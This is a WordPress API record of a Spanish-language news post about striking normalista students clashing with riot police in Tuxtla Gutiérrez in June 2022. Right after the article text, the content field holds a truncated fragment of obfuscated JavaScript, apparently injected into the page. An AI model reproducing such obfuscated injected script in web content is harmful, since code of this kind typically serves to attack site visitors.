{"id":3136,"date":"2022-06-22T22:23:00","date_gmt":"2022-06-22T22:23:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3136"},"modified":"2022-06-22T22:23:01","modified_gmt":"2022-06-22T22:23:01","slug":"se-enfrentan-normalistas-contra-policias-en-el-centro-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3136","title":{"rendered":"Se enfrentan normalistas contra polic\u00edas en el centro de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" data-id=\"3137\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0035-1024x765.jpg\" alt=\"\" class=\"wp-image-3137\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0035-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0035-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0035-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0035-1536x1148.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0035.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" data-id=\"3138\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0034-1024x765.jpg\" alt=\"\" class=\"wp-image-3138\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0034-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0034-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0034-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0034-1536x1148.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0034.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" data-id=\"3139\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0033-1024x765.jpg\" alt=\"\" class=\"wp-image-3139\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0033-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0033-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0033-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0033-1536x1148.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220622-WA0033.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho. <\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 22 de junio del 2022. Tuxtla Guti\u00e9rrez.- Normalistas y elementos del grupo antimot\u00edn, se enfrentaron en el centro de Tuxtla, durante una protesta radical efectuada por los estudiantes procedentes de la Escuela Normal Licenciado Manuel Larra\u00ednzar. El grupo arrib\u00f3 a la capital chiapaneca para protestar en contra  de los actos racistas cometidos por la directora de este plantel. Despu\u00e9s de la marcha y la conferencia retuvieron dos camiones de empresas refresqueras y bloquearon la Avenida Central a la altura de la 1a Oriente. Los estudiantes aventaron una de las unidades retenidas  contra una mamparas de metal que proteg\u00edan la entrada del estacionamiento del edificio p\u00fablico donde se encontraban resguardando polic\u00edas.Ante ello los polic\u00edas  comenzaron a disparar balas de gas lacrim\u00f3geno, pudiendo as\u00ed dispersar a los manifestantes.Esto gener\u00f3 temor en la poblaci\u00f3n, y los comerciantes que optaron por bajar sus cortinas. Despu\u00e9s de la refriega, los estudiantes retornaron a San Crist\u00f3bal sentenciando que continuar\u00e1n con las acciones radicales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 22 de junio del 2022. Tuxtla Guti\u00e9rrez.- Normalistas y elementos del grupo antimot\u00edn, se enfrentaron en el centro de Tuxtla, durante una protesta radical efectuada por los estudiantes procedentes de la Escuela Normal Licenciado Manuel Larra\u00ednzar. El grupo arrib\u00f3 a la capital chiapaneca para protestar en contra de los actos racistas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3138,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3136","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3136"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3136\/revisions"}],"predecessor-version":[{"id":3140,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3136\/revisions\/3140"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3138"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3136"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}